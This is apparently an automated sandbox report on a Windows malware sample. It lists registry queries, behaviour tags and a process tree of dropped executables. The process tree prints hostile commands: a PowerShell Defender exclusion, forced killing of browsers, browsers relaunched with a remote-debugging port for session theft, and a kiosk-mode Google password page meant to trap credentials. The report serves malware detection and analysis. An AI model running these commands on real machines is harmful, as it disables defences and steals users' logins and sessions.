| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107410101\263971d093.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107390101\4b886460ab.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language | C:\Users\Admin\AppData\Local\Temp\10107390101\4b886460ab.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107320101\nhDLtPT.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\BB8Z9QLVS663O4EQKUQWIVS.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107380101\9bd1404279.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage | C:\Users\Admin\AppData\Local\Temp\10107390101\4b886460ab.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107370101\c29c440560.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133856873749173507" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe
"C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
C:\Users\Admin\AppData\Local\Temp\10107200101\zY9sqWs.exe
"C:\Users\Admin\AppData\Local\Temp\10107200101\zY9sqWs.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10107211121\PcAIvJ0.cmd"
C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe
"C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe"
C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe"
C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe"
C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe"
C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe"
C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4596 -ip 4596
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4596 -s 796
C:\Users\Admin\AppData\Local\Temp\10107240101\ce4pMzk.exe
"C:\Users\Admin\AppData\Local\Temp\10107240101\ce4pMzk.exe"
C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe
"C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe"
C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe
"C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4496 -ip 4496
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4496 -s 800
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\10107260101\SvhQA35.exe
"C:\Users\Admin\AppData\Local\Temp\10107260101\SvhQA35.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe
C:\Users\Admin\AppData\Local\Temp\10107260101\SvhQA35.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\Oar936gK\Anubis.exe""
C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe
"C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe"
C:\Users\Admin\AppData\Local\Temp\10107280101\Ps7WqSx.exe
"C:\Users\Admin\AppData\Local\Temp\10107280101\Ps7WqSx.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff99555cc40,0x7ff99555cc4c,0x7ff99555cc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1912,i,11762335795755205314,7482908786277413718,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1904 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2140,i,11762335795755205314,7482908786277413718,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2164 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2220,i,11762335795755205314,7482908786277413718,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2236 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3168,i,11762335795755205314,7482908786277413718,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3180 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3204,i,11762335795755205314,7482908786277413718,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3212 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4232,i,11762335795755205314,7482908786277413718,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4452 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4684,i,11762335795755205314,7482908786277413718,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4448 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4644,i,11762335795755205314,7482908786277413718,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4764 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4840,i,11762335795755205314,7482908786277413718,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4848 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4616,i,11762335795755205314,7482908786277413718,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4668 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4632,i,11762335795755205314,7482908786277413718,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4660 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5048,i,11762335795755205314,7482908786277413718,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4720 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5240,i,11762335795755205314,7482908786277413718,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5260 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5248,i,11762335795755205314,7482908786277413718,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5400 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=4860,i,11762335795755205314,7482908786277413718,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5344 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9955646f8,0x7ff995564708,0x7ff995564718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,6178398465063867357,3272688161587545164,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2120 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,6178398465063867357,3272688161587545164,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2108,6178398465063867357,3272688161587545164,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2924 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2108,6178398465063867357,3272688161587545164,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3212 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2108,6178398465063867357,3272688161587545164,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2108,6178398465063867357,3272688161587545164,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4884 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2108,6178398465063867357,3272688161587545164,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4912 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\10107290101\ktxzLhN.exe
"C:\Users\Admin\AppData\Local\Temp\10107290101\ktxzLhN.exe"
C:\Users\Admin\AppData\Local\Temp\dll32.exe
"C:\Users\Admin\AppData\Local\Temp\dll32.exe"
C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
"C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe"
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\10107320101\nhDLtPT.exe
"C:\Users\Admin\AppData\Local\Temp\10107320101\nhDLtPT.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\a1vsr" & exit
C:\Windows\SysWOW64\timeout.exe
timeout /t 11
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe
"C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe"
C:\Users\Admin\AppData\Local\Temp\10107370101\c29c440560.exe
"C:\Users\Admin\AppData\Local\Temp\10107370101\c29c440560.exe"
C:\Users\Admin\AppData\Local\Temp\BB8Z9QLVS663O4EQKUQWIVS.exe
"C:\Users\Admin\AppData\Local\Temp\BB8Z9QLVS663O4EQKUQWIVS.exe"
C:\Users\Admin\AppData\Local\Temp\10107380101\9bd1404279.exe
"C:\Users\Admin\AppData\Local\Temp\10107380101\9bd1404279.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp74A9.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp74A9.tmp.bat
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 4036"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Users\Admin\AppData\Roaming\AdminUserCash\tempdatalogger.exe
"C:\Users\Admin\AppData\Roaming\AdminUserCash\tempdatalogger.exe"
C:\Users\Admin\AppData\Local\Temp\10107390101\4b886460ab.exe
"C:\Users\Admin\AppData\Local\Temp\10107390101\4b886460ab.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM firefox.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM chrome.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM msedge.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM opera.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM brave.exe /T
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1972 -parentBuildID 20240401114208 -prefsHandle 1892 -prefMapHandle 1884 -prefsLen 27434 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1288b6b4-acc0-4fb8-b3e0-bf258b5d3e09} 868 "\\.\pipe\gecko-crash-server-pipe.868" gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2448 -parentBuildID 20240401114208 -prefsHandle 2440 -prefMapHandle 2428 -prefsLen 28354 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {919343b5-487f-4bb9-8234-2ba94088cbb6} 868 "\\.\pipe\gecko-crash-server-pipe.868" socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2952 -childID 1 -isForBrowser -prefsHandle 3092 -prefMapHandle 3084 -prefsLen 22746 -prefMapSize 244658 -jsInitHandle 896 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bd8b631e-889c-4d04-95d5-5f47b1f657a2} 868 "\\.\pipe\gecko-crash-server-pipe.868" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3768 -childID 2 -isForBrowser -prefsHandle 3760 -prefMapHandle 2656 -prefsLen 32844 -prefMapSize 244658 -jsInitHandle 896 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4fb1000a-5b0a-4287-ba1f-a802406fb8d8} 868 "\\.\pipe\gecko-crash-server-pipe.868" tab
C:\Program Files\Mozilla Firefox\firefox.exe
